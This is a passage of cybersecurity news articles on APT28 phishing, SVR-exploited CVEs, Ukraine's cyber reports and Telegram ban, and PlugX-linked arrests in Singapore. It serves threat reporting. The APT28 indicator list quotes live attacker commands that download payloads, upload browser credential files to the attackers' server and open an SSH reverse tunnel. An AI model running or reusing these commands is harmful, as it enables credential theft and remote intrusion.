Espionage News

Ukraine is confronting a new cyberattack vector from Russian military intelligence (GRU) connected hackers that is targeting local governments. The Computer Emergency Response Team of Ukraine (CERT-UA) recently uncovered an advanced phishing campaign by the Russian GRU-linked APT28, or “Fancy Bear.” Using a novel approach, attackers lure recipients into executing malicious PowerShell commands directly from their clipboard—a new technique for delivering malware with minimal interaction. Google’s reCAPTCHA Lookalike Emails flagged by CERT-UA were found circulating within local government offices under the subject line “Table Replacement.” Instead of standard attachments, these emails embed a link mimicking a Google spreadsheet. Clicking the link initiates an imitation of Google’s reCAPTCHA, a tactic used to disarm suspicion by mimicking a bot prevention screen. However, unlike legitimate reCAPTCHA prompts, this decoy performs an unseen action: it copies a malicious PowerShell command directly to the user’s clipboard. Following this, instructions prompt users to press “Win+R,” which opens the command prompt, followed by “Ctrl+V” to paste and then “Enter” to execute it. Once executed, the payload launches, compromising the system. The Trojanized Google reCAPTCHA and the PowerShell scripts it runs. (Source: CERT-UA) APT28’s tactics demonstrate how these groups exploit familiar actions in routine tasks to mask their intentions. This technique capitalizes on basic system functions and leverages users’ trust in seemingly benign prompts, such as bot verification. CERT-UA analysis reveals that the command initiates a download and execution sequence. It launches “browser.hta,” a malicious HTML application, which in turn executes “Browser.ps1,” a PowerShell script designed to steal data from popular browsers, including Chrome, Edge, Opera, and Firefox. Additionally, it uses an SSH tunnel for exfiltration, allowing stolen credentials and other sensitive data to be transported directly to the attackers. One of the more concerning aspects involves the script’s capability to download and run the Metasploit framework, a tool used widely in penetration testing but increasingly getting popular among threat actors. Fancy Bear Gets Fancy with its Expanding Arsenal This isn’t the first time Ukrainian entities faced APT28’s targeted operations. CERT-UA reported in September that the group used a Roundcube email vulnerability (CVE-2023-43770) to redirect email data. The malicious scripts run post Roundcube vulnerability exploitation (Source; CERT-UA) Exploiting this vulnerability enabled attackers to implant a filter that auto-forwarded emails to an attacker-controlled address. During that attack, CERT-UA found that at least ten compromised government email accounts were used to transmit further exploits to Ukrainian defense contacts. In both attacks, APT28 used a compromised server, mail.zhblz[.]com, for control. The IP linked to this server (203.161.50[.]145) has surfaced in prior campaigns, signifying APT28’s evolving operational infrastructure to evade detection while maintaining continuity across attacks. With APT28’s ongoing activity, CERT-UA has recommended that government agencies be on the lookout of increasingly targeted spear-phishing campaigns designed to exploit both user trust and routine tasks. Also read: Russian Hacker Group APT28 Launches HeadLace Malware via Fake Car Ads to Target Diplomats Indicators of Compromise Shared by CERT-UA File Hashes: e9cb6270f09e3324e6620b8c909a83c6 d34ee70f162ce1dab6a80a6a3c8dabd8d2b1a77345be5b1d956c765752b11802 Browser.ps1   d73124dbb5d8e5702df065a122878740 4e1bc758f08593a873e5e1d6f7d4eac05f690841abc90ddfa713c2bec4f9970f Browser.ps1   597bd15ff25636d9cde61157c2a3c8a2 5200a4e1bb5174a3203ce603c34625493a5a88f0dfb98ed5856b18655fb7ba60 browser.hta   446bab23379df08fecbab6fe9b00344e 3ec9a66609f1bea8f30845e5dbcf927cf0b3e92e40ef40272fdf6d784ba0d0af zapit.exe [METASPLOIT] f389247be7524e2d4afc98f6811622fe e3a3abf8c80637445bab387be288b6475992b6b556cb55a5a8c366401fb864c5 rdp.exe   981943d2e7ec0ab3834c639f49cc4b42 6bbf2b86e023f132416f40690b0386bd00e00cf3e1bef725dec92df7f1cd1007 id_rsa   d26920b81f4e6b014a0d63169e68dfa7 edb81219b7728fa2ea1d97d5b3189f498ed09a72b800e115f12843f852b2a441 ssh.exe (legit)   d1ccc802272a380b32338d17b2ac40a1 2446ab2e4dc85dc8b27141b2c1f777a01706f16d6608f4b5b0990f8b80dea9e0 libcrypto.dll (legit) Network: hXXps://docs.google.com.spreadsheets.d.1ip6eeakdebmwteh36vana4hu-glaeksstsht-boujdk.zhblz[.]com/document (tcp)://mail.zhblz[.]com:8443 hXXps://mail.zhblz[.]com hXXps://mail.zhblz[.]com/B hXXps://mail.zhblz[.]com/b hXXps://mail.zhblz[.]com/endpoint hXXps://mail.zhblz[.]com/upload hXXps://mail.zhblz[.]com/z hXXps://mail.zhblz[.]com/id_rsa hXXps://mail.zhblz[.]com/libcrypto hXXps://mail.zhblz[.]com/ssh (tcp)://203[.]161.50.145:22 (tcp)://203[.]161.50.145:6211 (tcp)://45[.]61.169.221:445 doc.gmail.com.gyehddhrggdii323sdhnshiswh2udhqjwdhhfjcjeuejcj.zhblz[.]com docs.google.com.spreadsheets.d.1ip6eeakdebmwteh36vana4hu-glaeksstsht-boujdk.zhblz[.]com mail.zhblz[.]com 203[.]161.50.145     45[.]61.169.221      Indicators from incident CERT-UA#10859 (unauthorized access to mailboxes) 103[.]50.33.50 103[.]50.33.54 109[.]236.63.165 185[.]197.248.94 194[.]35.121.200 194[.]35.121.202 194[.]35.121.50 195[.]64.155.64 198[.]54.117.242 203[.]161.50.145 37[.]19.218.144 37[.]19.218.146 37[.]19.218.156 37[.]19.218.157 37[.]19.218.160 37[.]19.218.168 37[.]19.218.174 37[.]19.218.183 45[.]155.43.118 45[.]155.43.121 45[.]94.211.159 45[.]94.211.161 45[.]94.211.164 80[.]77.25.206 95[.]214.216.76 95[.]214.216.78 95[.]214.217.94 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0 exchangelib/5.4.2 (python-requests/2.32.3) Hosts: %APPDATA%\id_rsa %APPDATA%\zapit.exe %APPDATA%\ssh.exe %APPDATA%\libcrypto.dll C:\Users\Malgus\source\repos\rdp\rdp\obj\Debug\rdp.pdb mshta https://mail.zhblz.com/b ssh recaptcha@203.161.50.145 -N -i %APPDATA%\id_rsa -R 0 -o StrictHostKeyChecking=no -o “PermitLocalCommand=yes” -o “LocalCommand=ssh -i \\45.61.169.221\key.pem user@1.1 .1.1” %APPDATA%\ssh.exe recaptcha@203.161.50.145 -N -i %APPDATA%\id_rsa -R 0 -o StrictHostKeyChecking=no powershell -WindowStyle Hidden -nop -exec bypass -c “iex (New-Object Net.WebClient).DownloadString(‘https://mail.zhblz.com/B’);pumpndump -hq https://mail.zhblz. com;mshta https://mail.zhblz.com/b # ✅ ”I am not a robot – reCAPTCHA ID: {verification_id}”” powershell -WindowStyle Hidden -nop -exec bypass -c “Invoke-RestMethod -Uri https://mail.zhblz.com/upload -Method Post -Body (@{filename=’logins.json’;file='<Base64EncodedData> ‘}|ConvertTo-Json) -ContentType ‘application/json'” powershell -WindowStyle Hidden -nop -exec bypass -c “Invoke-RestMethod -Uri https://mail.zhblz.com/upload -Method Post -Body (@{filename=’key4.db’;file='<Base64EncodedData> ‘}|ConvertTo-Json) -ContentType ‘application/json'” powershell -WindowStyle Hidden -nop -exec bypass -c “Invoke-WebRequest -Uri https://mail.zhblz.com/libcrypto -OutFile %APPDATA%\libcrypto.dll” powershell -WindowStyle Hidden -nop -exec bypass -c “Invoke-WebRequest -Uri https://mail.zhblz.com/ssh -OutFile %APPDATA%\ssh.exe” powershell -WindowStyle Hidden -nop -exec bypass -c “Invoke-WebRequest -Uri https://mail.zhblz.com/z -OutFile %APPDATA%\zapit.exe” powershell -WindowStyle Hidden -nop -exec bypass -c “Invoke-WebRequest https://mail.zhblz.com/id_rsa -OutFile $env:APPDATA\id_rsa”  

Washington’s narrative – corroborated by Microsoft’s findings – of the China-linked Volt Typhoon group is just a cover for U.S. intelligence hacking into Chinese infrastructure, a 60-page report from Beijing’s top cyber defense agency charged. The report, released on Monday by the National Computer Virus Emergency Response Center (CVERC), accused the U.S. government of meticulously crafting a disinformation campaign aimed at both misdirecting attention and maintaining dominance in the global cyber arena. The allegations point to deep-rooted strategies used by the U.S. to perpetuate its cyber espionage activities while blaming adversaries like China and Russia. But behind the noise lies a much more intricate revelation of cyber warfare tactics, including the use of False Flag operations and stealth tools designed to mask the true origins of these attacks, the report alleges. The ‘Marble’ Toolkit and False Flag Tactics At the center of the accusations is a U.S. intelligence toolkit that China calls “Marble.” This tool allegedly helps cloak the true source of cyberattacks by obfuscating the coding signatures typically used to trace attackers. What makes Marble particularly dangerous, according to China’s report, is its ability to insert foreign language strings into the malware code—languages like Mandarin and Russian—to mislead investigators and pin the blame on foreign actors. False Flag operations, a tactic where one country carries out attacks disguised as another, have become central to modern cyber warfare, China said. In the digital realm, this tactic aims to confuse attribution, the process by which investigators link a cyberattack to its origin. With attribution often serving as the basis for geopolitical decisions, misdirection on this scale could have serious consequences. Influence Operations and Cyber Dominance The allegations don’t stop at cyberattacks alone. According to CVERC’s investigation, the U.S. has woven these tactics into a broader strategy of influence operations. These operations aim to shape perceptions, spread disinformation, and destabilize target nations. They go beyond the battlefield of bits and bytes, extending into media and public discourse. The report claims the U.S. employs a framework of 4D principles—deny, disrupt, degrade, deceive—to maintain control over the narrative in cyberspace. These principles, seen in disinformation campaigns like Volt Typhoon, are designed to manipulate how cyberattacks are perceived, allowing the U.S. to downplay its own activities while amplifying those of its adversaries. China also came down heavily on the usage of naming conventions like “Panda” and “Dragon” used in the attribution of China-linked threat actors, claiming it is geopolitically motivated and equivalent to racial targeting. Some U.S. companies, such as Microsoft and CrowdStrike, for their commercial interest and without sufficient evidence and rigorous technical analysis, have been keen on coining various absurd codenames with obvious geopolitical overtones for hacker groups, such as ‘typhoon,’ ‘panda,’ and ‘dragon,’ instead of ‘Anglo-Saxon,’ ‘hurricane,’ and ‘koala,'” the CVERC report said. Global Surveillance: The ‘UpStream’ and ‘Prism’ Projects The core of the accusations against the U.S. is its alleged use of mass surveillance projects, known as “UpStream” and “Prism,” which work together to siphon vast amounts of data from global internet traffic. UpStream, according to the report, is designed to capture raw communication data passing through key internet infrastructure like submarine fiber optic cables, while Prism allows U.S. intelligence agencies to access user data from major tech companies like Microsoft, Google, and Facebook. By combining these two systems, the U.S. allegedly maintains the ability to monitor vast quantities of data in real-time. This capability provides actionable intelligence for military, diplomatic, and economic purposes, making the U.S. a formidable player in the world of cyber espionage. But it’s not just foreign adversaries that are affected. The report suggests that U.S. citizens, despite legal protections like FISA Section 702, also fall under the watchful eye of these surveillance programs. The Foreign Intelligence Surveillance Court itself has acknowledged several violations, pointing to instances where U.S. intelligence agencies allegedly overstepped their bounds, the report suggests. Backdoor Implants and Supply Chain Attacks Another concerning element is the claim that U.S. intelligence agencies conduct supply chain attacks, where they insert backdoors into hardware and software products sold to foreign targets. Once compromised, these products can act as entry points for further espionage. The National Security Agency’s (NSA) Office of Tailored Access Operations (TAO) allegedly plays a key role in these activities. By intercepting shipments of network equipment, disassembling them, and implanting malicious backdoors, the NSA ensures long-term access to compromised systems. These supply chain attacks represent one of the most covert and effective ways to infiltrate secure networks, posing significant risks to critical infrastructure across the globe, China said. Global Fallout: Targeting Allies and Adversaries Alike China added that U.S.’ espionage activities haven’t been limited to adversaries. It said, allies such as Germany, France, and Japan have also found themselves under the surveillance lens, with high-level communications reportedly intercepted as part of broader intelligence-gathering efforts. For instance, German Chancellor Angela Merkel’s communications were allegedly monitored by U.S. intelligence, causing a diplomatic rift between the two nations when the operation was exposed, CVERC reported. Similar accusations have surfaced regarding France, with the NSA reportedly eavesdropping on phone calls from French government officials and business leaders. U.S. Companies’ Role in Espionage Microsoft, one of the largest cloud and enterprise software providers globally, has found itself entangled in these accusations. According to the report, Microsoft’s tools and platforms may be integral to U.S. intelligence operations, providing both the infrastructure and capabilities for data collection. The report also alleges that Microsoft has been developing tools specifically for U.S. intelligence, further deepening its collaboration with the federal government. This relationship, the report suggests, raises serious questions about privacy and the ethical implications of corporate cooperation in state-led surveillance activities. Interestingly, both Microsoft and the U.S. government have time and again placed the same accusations on Volt Typhoon, which China has disputed.

Russian Foreign Intelligence Service (SVR) cyber actors are once again in the spotlight, exploiting widespread vulnerabilities in a global campaign aimed at government, technology, and finance sectors. In a new joint advisory, the UK’s National Cyber Security Centre (NCSC) and U.S. agencies warned that SVR cyber operations, known for the SolarWinds attack and targeting COVID-19 vaccine research, have shifted their focus to unpatched software vulnerabilities across a range of sectors. “Russian cyber actors are interested in and highly capable of accessing unpatched systems across a range of sectors, and once they are in, they can exploit this access to meet their objectives.” – Paul Chichester, NCSC Director of Operations SVR’s Tactics: A Persistent Global Threat The SVR, also referred to as APT29 or Cozy Bear, has demonstrated an alarming ability to exploit known vulnerabilities, particularly those left unpatched by organizations. The group is infamous for its persistent and stealthy cyber operations, often targeting government entities, think tanks, and private corporations to collect foreign intelligence. One key aspect of their approach is the two types of targets they pursue. The first includes entities of strategic interest such as governments, financial institutions, and technology companies. These “targets of intent” are carefully selected for their intelligence value. The second group, known as “targets of opportunity,” consists of any organization with unpatched systems that can be exploited for malicious purposes. SVR Exploiting Unpatched Vulnerabilities at Scale The advisory includes over 20 publicly disclosed vulnerabilities that SVR actors are actively targeting. Organizations across the globe, including those in the UK, are being urged to rapidly deploy patches and prioritize software updates to minimize exposure to these threats. Once SVR actors gain initial access through unpatched systems, they can escalate privileges and move laterally across networks, often compromising connected systems such as supply chains. This enables them to launch further operations, including espionage, data exfiltration, and network disruption. Following is the complete list of unpatched vulnerabilities that Russian SVR was observed exploiting: CVE Vendor/Product Details CVE-2023-20198 Cisco IOS XE Software web UI feature Privilege escalation vulnerability that allows an attacker to create a local user and password combination CVE-2023-4911 RHSA GNU C Library’s dynamic loader ld.so Buffer overflow vulnerability that could allow a local attacker to execute code with elevated privileges CVE-2023-38545 Haxx Libcurl SOCKS5 heap buffer overflow vulnerability CVE-2023-38546 Haxx Libcurl Missing authorization vulnerability that allows an attacker to insert cookies in a running program if certain conditions are met CVE-2023-40289 Supermicro X11SSM-F, X11SAE-F, and X11SSE- F 1.66 Command injection vulnerability that allows an attacker to elevate privileges CVE-2023-24023 Bluetooth BR/EDR devices with Secure Simple Pairing and Secure Connections pairing in Bluetooth Core Specification 4.2 through 5.4 Allows certain man-in-the-middle attacks that force a short key length [CWE-326], and might lead to discovery of the encryption key and live injection, aka BLUFFS. CVE-2023-40088 Android Use after free vulnerability that could lead to remote (proximal, adjacent) code execution CVE-2023-40076 Google Android 14.0 Permissions bypass vulnerability that allows an attacker to access credentials and escalate local privileges CVE-2023-40077 Google Android 11-14 Use after free vulnerability that can lead to escalation of privileges CVE-2023-45866 Bluetooth HID Hosts in BlueZ Improper authentication vulnerability that could allow an attacker in close proximity to inject keystrokes and carry out arbitrary commands CVE-2022-40507 Qualcomm Double free vulnerability CVE-2023-36745 Microsoft Exchange Server Remote code execution CVE-2023-4966 Citrix NetScaler ADC, NetScaler Gateway Buffer overflow vulnerability CVE-2023-6345 Google Chrome Integer overflow vulnerability that allows a remote attacker to potentially perform a sandbox escape via a malicious file CVE-2023-37580 Zimbra Cross-site scripting (XSS) vulnerability CVE-2021-27850 Apache Tapestry Critical unauthenticated remote code execution vulnerability CVE-2021-41773 Apache HTTP server 2.4.99 Directory traversal vulnerability CVE-2021-42013 Apache HTTP server 2.4.50 Remote code execution vulnerability CVE-2018-13379 Fortinet FortiGate SSL VPN Path traversal vulnerability CVE-2023-42793 JetBrains TeamCity Authentication bypass vulnerability CVE-2023-29357 SharePoint Server Elevation of privilege vulnerability CVE-2023-24955 SharePoint Server Remote code execution vulnerability CVE-2023-35078 Ivanti Endpoint Manager Mobile versions through 11.10 Authentication bypass vulnerability CVE-2023-5044 Kubernetes Ingress-nginx Code injection vulnerability Not Just a Cybersecurity Threat: Broader Implications The report also sheds light on how SVR actors adapt their techniques to keep pace with evolving technology. The NCSC warns that the group has adjusted its approach in response to the increasing reliance on cloud infrastructure, exploiting cloud misconfigurations and weak security practices. This makes them a formidable adversary for organizations that are migrating or already relying heavily on cloud services. SVR actors have also been linked to recent large-scale attacks, including the supply chain compromise of SolarWinds and a series of spear-phishing campaigns targeting COVID-19 vaccine research. These incidents demonstrate the group’s focus on strategic assets and their potential to impact national security and public health. APT29’s Arsenal: From Phishing to Supply Chain Attacks The advisory also outlines the tactics, techniques, and procedures (TTPs) employed by SVR cyber actors. Their arsenal includes spear-phishing campaigns, password spraying, supply chain attacks, and the abuse of trusted relationships. These methods allow them to gain initial access and conduct follow-up operations from compromised accounts. For instance, in recent campaigns, SVR actors were found to exploit cloud environments using Microsoft Teams accounts impersonating technical support to trick victims into granting access. By compromising poorly secured small business accounts, they were able to create platforms for targeting high-profile organizations. Infrastructure and Evasion Tactics SVR cyber actors are known for their ability to remain undetected for extended periods. They frequently use The Onion Router (TOR) network and proxy services to obfuscate their activity. In some cases, they lease infrastructure using fake identities and low-reputation email accounts to avoid detection. When SVR suspects that their operations have been uncovered, they move quickly to destroy their infrastructure and any evidence on it. This evasive approach makes it difficult for investigators to trace their operations back to the original source. Recent Exploitations: Zimbra, JetBrains, and More SVR actors have also been involved in exploiting several high-profile vulnerabilities. For example, the advisory mentions the exploitation of Zimbra mail servers using CVE-2022-27924, a command injection vulnerability that allowed attackers to access user credentials without victim interaction. More recently, they exploited JetBrains TeamCity’s CVE-2023-42793 vulnerability, enabling arbitrary code execution. This kind of exploitation highlights SVR’s focus on widely used software systems, allowing them to infiltrate a broad range of sectors and geographies. Mitigations: What Organizations Can Do In light of these ongoing campaigns, the NCSC and U.S. agencies have provided several recommendations to help organizations defend against SVR cyber actors. These include: Rapid deployment of patches and updates: Organizations should prioritize software updates as soon as they become available to close known vulnerabilities. Multi-factor authentication: Implementing multi-factor authentication across networks and systems can reduce the risk of unauthorized access. Auditing cloud accounts: Regularly auditing cloud-based accounts for unusual activity can help detect intrusions before they escalate. Reducing attack surface: Disable unnecessary internet-facing services and remove unused applications to limit points of entry for attackers.

Moscow preferred espionage over destruction in its cyber offensive strategy against Ukraine in the first half of 2024, displaying the evolving nature of Kremlin’s targeted cyberattacks on Kyiv. The cyber battlefield has shifted in 2024, with Russian hacker groups adopting more covert and long-term strategies. Rather than the large-scale infrastructure attacks seen in previous years, Russian cyber operatives have turned to espionage, focusing on military and critical infrastructure targets to support their ongoing war against Ukraine. While cyber incidents have risen overall, the number of high and critical severity attacks has dropped. This shift marks a strategic change, moving from broad, destructive cyberattacks to more focused and sustained infiltration efforts aimed at gathering intelligence. The Numbers Behind the Attacks A report released on Monday by the Computer Emergency Response Team of Ukraine revealed this shift in focus. H1 2024 saw a total of 1,739 cyber incidents, a 19% increase from the second half of 2023. However, the number of critical incidents dropped by 90%, with only three reported in the first half of 2024 compared to 31 in the latter half of 2023. High-severity incidents also saw a sharp decline, falling by 71%, while medium and low-severity incidents increased by 32% and 75%, respectively. Source: SSSCIP This data suggests that while the overall frequency of cyberattacks has grown, the attackers’ tactics have shifted towards lower-profile activities designed to avoid detection. These lower-severity incidents often involve malware distribution, espionage, and efforts to maintain access to compromised systems rather than causing immediate, visible damage. Source: SSSCIP Targeted Espionage and Covert Operations In 2022 and 2023, Russian hackers focused on disrupting Ukraine’s critical infrastructure, aiming to cripple government agencies, energy providers, and internet service providers (ISPs). However, the swift recovery of Ukraine’s systems meant these attacks did not achieve their intended long-term goals. The 2024 shift towards espionage reflects a more calculated approach. Groups like UAC-0184 and UAC-0020 aka Vermin hacker group, both linked to Russian intelligence services, have been particularly active this year. These groups specialize in cyber espionage, using phishing campaigns and malicious software to gain access to sensitive systems. UAC-0184, for example, has targeted members of Ukraine’s Defense Forces through messaging apps like Signal, impersonating trusted contacts to distribute malware. Once the malware is deployed, the hackers can monitor communications, steal data, and maintain long-term control over the compromised systems. This pivot from overt attacks to espionage also marks a new phase in Russia’s cyber strategy. Rather than causing immediate disruption, the focus now lies in gathering intelligence to support military operations. CERT-UA’s report highlights how hackers are using cyber operations to collect feedback on kinetic military strikes, such as missile attacks. Critical Infrastructure Still in Focus Though espionage has taken center stage, attacks on critical infrastructure continue. The report notes that attacks on Ukraine’s energy sector have more than doubled since the latter half of 2023, with hackers increasingly targeting industrial control systems (ICS) used by power, heat, and water supply facilities. The UAC-0002 group, which has ties to Russian law enforcement in occupied Luhansk, executed a significant supply chain attack in March 2024. The hackers exploited vulnerabilities in software used by at least 20 energy companies, gaining access to ICS and using it for lateral movement within the networks. This kind of supply chain attack allows hackers to breach multiple organizations simultaneously by targeting a common service provider. In the March incident, UAC-0002 targeted three supply chains, infecting multiple energy companies with malware and backdoors. The attackers used specialized software, such as LOADGRIP and BIASBOAT, to gain access to critical systems and escalate their attacks, possibly to complement physical strikes on Ukrainian infrastructure. Messenger Account Theft: New Entrant in Cyber Offensive Strategy Another notable trend in 2024 is the increasing focus on messenger account theft. Platforms like WhatsApp and Telegram, widely used by Ukrainian citizens, have become prime targets for Russian hackers. Source: SSSCIP The UAC-0195 group, for instance, used phishing campaigns to compromise thousands of messenger accounts. These compromised accounts are then used for a range of malicious activities, including spreading malware, conducting espionage, and committing financial fraud. In one instance, hackers posed as organizers of a petition to honor a fallen Ukrainian soldier. They directed victims to a fake website mimicking the President of Ukraine’s official page, where users were asked to authenticate via WhatsApp. This phishing tactic allowed hackers to add their devices to victims’ WhatsApp accounts, gaining access to personal messages, files, and contacts. This tactic extended to Telegram, where hackers used a similar method to lure users into “voting” in an art competition, once again gaining unauthorized access to accounts. With this access, hackers can impersonate the account holder, spread further phishing links, and even steal sensitive information from high-value targets. The latest findings were revealed just days after Ukraine banned the use of Telegram messenger app on any of the government, military or critical infrastructure-linked devices. This decisive move follows growing concerns over its vulnerability to cyber espionage. The NCSCC’s meeting on September 19 highlighted how the widely used app has transformed from a tool for free speech into a weapon of war. Phishing Campaigns and Malware Distribution Phishing remains a key tool for Russian hackers. In early 2024, UAC-0006, a financially motivated group, continued its phishing campaigns targeting employees in financial departments. These campaigns often used polyglot archives—files that appear differently depending on the software used to open them—to deliver malware like SmokeLoader. Once deployed, SmokeLoader allows attackers to install additional malware, such as TALESHOT, which captures screenshots when a banking application is open. This malware enables hackers to gain a deeper understanding of the victim’s activities and access critical financial data. In some cases, hackers even edited or created fraudulent invoices to steal funds from targeted organizations. The UAC-0006 group briefly paused operations in March 2024, but returned in May with renewed efforts, registering new domains to continue phishing attacks and regain control over previously compromised systems. Ukraine’s Cyber Resilience: A Battle on Two Fronts Despite the rising number of cyberattacks, Ukraine’s cyber defenses have shown remarkable resilience. CERT-UA, in collaboration with the State Service for Special Communications and Information Protection (SSSCIP), has made significant strides in defending against these threats. Their efforts have resulted in a sharp decline in high-severity incidents, even as overall attack numbers rise. The report credits improved visibility and collaboration with international partners for this success. Enhanced detection capabilities, coupled with better awareness among organizations, have allowed Ukraine to respond more quickly to emerging threats. This collaboration includes sharing cyber threat intelligence with CERT-UA’s partners, which has helped identify and mitigate numerous attacks. However, the report also warns that the capabilities of Russian hackers continue to grow as the war drags on. The increasing sophistication of supply chain attacks and the persistent threat of phishing campaigns mean that Ukraine’s cyber defense strategies will be tested time and again.

Telegram CEO Pavel Durov has a new battle to fight as Ukraine bans Telegram messaging app citing national security concerns. The National Cybersecurity Coordination Center (NCSCC) in Ukraine has issued a strict directive: ban Telegram in government, military, and critical infrastructure sectors. This decisive move follows growing concerns over its vulnerability to cyber espionage, particularly in the context of Russia’s ongoing full-scale war against Ukraine. The NCSCC’s meeting on September 19 highlighted how the widely used app has transformed from a tool for free speech into a weapon of war. Telegram Under the Microscope Oleksandr Lytvynenko, Secretary of Ukraine’s National Security and Defense Council, didn’t mince words. He stressed the urgency of unifying efforts to safeguard national security and neutralize threats in cyberspace. His message was seconded by Ukraine’s Defense Intelligence Chief Kyrylo Budanov, who said, “I have always advocated freedom of speech, but the issue of Telegram is not a matter of freedom of speech, it is a matter of national security.” Joint Armed and Intelligence Forces’ Meeting held on September 19 (Source: NCSCC) Chief among the concerns discussed was Telegram’s susceptibility to Russian intelligence. Budanov presented alarming evidence at the meeting that suggested Russian special services can access user correspondence, including deleted messages, and harvest critical user data. This revelation solidified the case for banning the app across sensitive sectors. Telegram App as a Weapon of War The problem runs deeper than data breaches. Telegram has become a digital weapon. Representatives from Ukraine’s Security Service (SBU) and the General Staff of the Armed Forces described how Russian operatives use the platform to launch cyberattacks, spread phishing scams, and deliver malware. The app also aids in real-time war operations. Telegram’s geolocation feature allows attackers to pinpoint military positions, adjust missile strikes, and monitor troop movements. Russia’s hybrid warfare tactics blur the lines between traditional combat and cyber warfare, and Telegram serves as one of its sharpest tools, the Ukrainian intelligence said. The Ban on Telegram: A Necessary Countermeasure In light of these threats, Ukraine decided to ban Telegram from the work devices of government officials, military personnel, and staff in critical infrastructure roles. This is not a blanket ban, though. Only individuals whose duties require using the app, likely for intelligence or investigative purposes, are exempt. According to World Population Review, Ukraine currently has 10.76 million Telegram users, which is the ninth largest user base worldwide. The decision reflects a growing trend in cybersecurity policy, where operational security takes precedence over user convenience. With this move, Ukraine joins other nations tightening their grip on digital platforms that could be compromised by foreign adversaries. Securing National Communications During Wartime One of the meeting’s key focuses was ensuring the continued stability of Ukraine’s communication networks during Russia’s persistent cyberattacks. Telecommunications companies in Ukraine are under siege, with Russian hackers constantly targeting mobile and internet providers. The stakes are higher now than ever, with compromised communication channels potentially leading to catastrophic military consequences. The NCSCC endorsed a proposal to establish a center for sharing and analyzing cyber threat data, modeled after Europe’s ISAC (Information Sharing and Analysis Centers). The goal is to improve cooperation among telecom providers and government agencies, bolstering the country’s defenses against foreign attacks. Cybersecurity Beyond Telegram While Telegram has become the headline, the broader issue lies in how Ukraine can maintain cyber resilience under such intense pressure. The NCSCC’s initiatives are part of a larger strategy to strengthen national cybersecurity. One notable move is the creation of an automated platform—CyberTracker—that will monitor and track the implementation of the country’s Cybersecurity Strategy. This tool is expected to enhance long-term strategic planning and help Ukraine stay a step ahead of emerging cyberthreats. Additionally, gender equality in the cybersecurity sector also took center stage. The NCSCC approved a national initiative to promote the role of women in cybersecurity, recognizing the importance of diversity in this critical field. As Ukraine ramps up its cyber defenses, the contributions of women will be crucial in filling the talent gap that plagues many countries. A War on Information Russia’s war on Ukraine is not just a territorial conflict. It is a war on information. Misinformation and disinformation are rampant, with Telegram serving as a hotbed for both. The app’s encryption features, while intended to protect user privacy, have made it an ideal platform for spreading propaganda, manipulating public opinion, and coordinating attacks. For Ukraine, controlling the flow of information has become as crucial as defending its borders. And banning Telegram is just one piece of the puzzle. Kyiv’s decision speaks volumes about the evolving nature of warfare—where cybersecurity, data protection, and national defense are increasingly intertwined. Ukraine’s ban on Telegram comes after the messaging platform’s CEO Pavel Durov, was detained and arrested by French authorities last month. Pavel was picked up from Paris airport over allegations that his messaging app facilitated criminal activities, including money laundering and drug trafficking. Durov acknowledged that Telegram is not perfect and vowed to improve its processes for handling law enforcement requests, mentioning that the platform already removes millions of harmful posts and channels every day. However, he hit back at the way the entire drama unfolded. Durov is currently out on bail. What’s Next? Ukraine’s fight against cyber threats will not end with Telegram. The decision to restrict the app marks the beginning of a larger conversation about the role of technology in modern warfare. As state actors continue to exploit digital platforms, governments worldwide will face mounting pressure to rethink their cybersecurity strategies. The NCSCC’s September meeting laid the groundwork for future efforts to strengthen Ukraine’s cyber resilience but the road ahead is long. Yet for now, Ukraine has drawn a clear line in the sand: when it comes to national security, no app is above scrutiny.

Tech-savvy criminals operating from luxury condos in Singapore have just learned the hard way that no corner of the globe is out of reach for law enforcement. In an impressive sweep, Singapore’s police arrested six men believed to be part of a global cybercrime syndicate, following coordinated raids on Monday. The suspects—five Chinese nationals and one Singaporean—face charges related to illegal cyber activities, marking one of the largest busts of its kind in the region. A Coordinated Strike Against Cybercrime The Singapore Police Force mobilized 160 officers in a precision raid that targeted multiple locations across the country. The operation involved the Criminal Investigation Department, Police Intelligence Department, Special Operations Command, and the Internal Security Department. Authorities arrested six men, who they suspect belong to an international cybercrime syndicate involved in various malicious cyber activities, including hacking, theft of personal information, and cryptocurrency-related crimes. Along with the arrests, police seized electronic devices, cash, and cryptocurrency assets worth hundreds of thousands of U.S. dollars. A High-Stakes Operation: The Arrests One of the more significant arrests occurred at a high-end condominium along Bidadari Park Drive, where police apprehended a 42-year-old Chinese national. Inside his residence, authorities found five laptops, six mobile phones, and a trove of digital evidence, including credentials to access servers linked to notorious hacker groups. The individual had amassed cash totaling more than S$24,000 and held cryptocurrency assets valued at USD $850,000. Three other suspects, also Chinese nationals, were arrested at a luxury property along Mount Sinai Avenue. Each suspect played a unique role in the syndicate: A 38-year-old man possessed laptops containing personal data harvested from foreign entities. This kind of data, known as personally identifiable information (PII), includes sensitive details like names, email addresses, and social security numbers that can be exploited for identity theft or blackmail. Police seized more than S$52,000 in cash and other foreign currency. A 35-year-old man was found with a laptop brimming with hacking tools, reportedly preparing for imminent cyberattacks. Such tools are often designed to exploit vulnerabilities in internet servers, giving attackers control over networks and valuable data. Authorities confiscated laptops, phones, and additional cash. A 32-year-old man harbored software capable of controlling malware like PlugX—a remote access Trojan (RAT) known for its stealth capabilities. This sophisticated malware allows attackers to take over machines, gather data, and execute commands remotely. Police seized laptops and mobile devices from his residence. A fourth suspect, another 38-year-old Chinese national, was apprehended at his condo on Cairnhill Road. Police suspect this individual was involved in purchasing stolen personal information, underscoring the commercial aspect of modern cybercrime. Investigators confiscated S$465,000 in cash, one laptop, and multiple phones. Finally, a 34-year-old Singaporean man was arrested at an HDB block along Hougang Avenue. Authorities believe he acted as an accomplice to the syndicate, aiding in the illegal cyber operations carried out on Singaporean soil. PlugX, a Fave Chinese Espionage Tool PlugX is a sophisticated Remote Access Tool (RAT) that has been active since approximately 2012. It is used by multiple threat groups for cyber espionage activities, especially China-linked. According to Cyble Research and Intelligence Labs, 39 threat actors—all origination from China—have been historically observed using PlugX for espionage. Brief list of China-linked threat actors using PlugX RAT (Source: Cyble Research and Intelligence Labs) Threat actors employ PlugX to gain full control over victims’ machines remotely, enabling them to execute commands like capturing the screen, logging keystrokes, managing processes, services, and registry entries, as well as opening a shell, researchers at 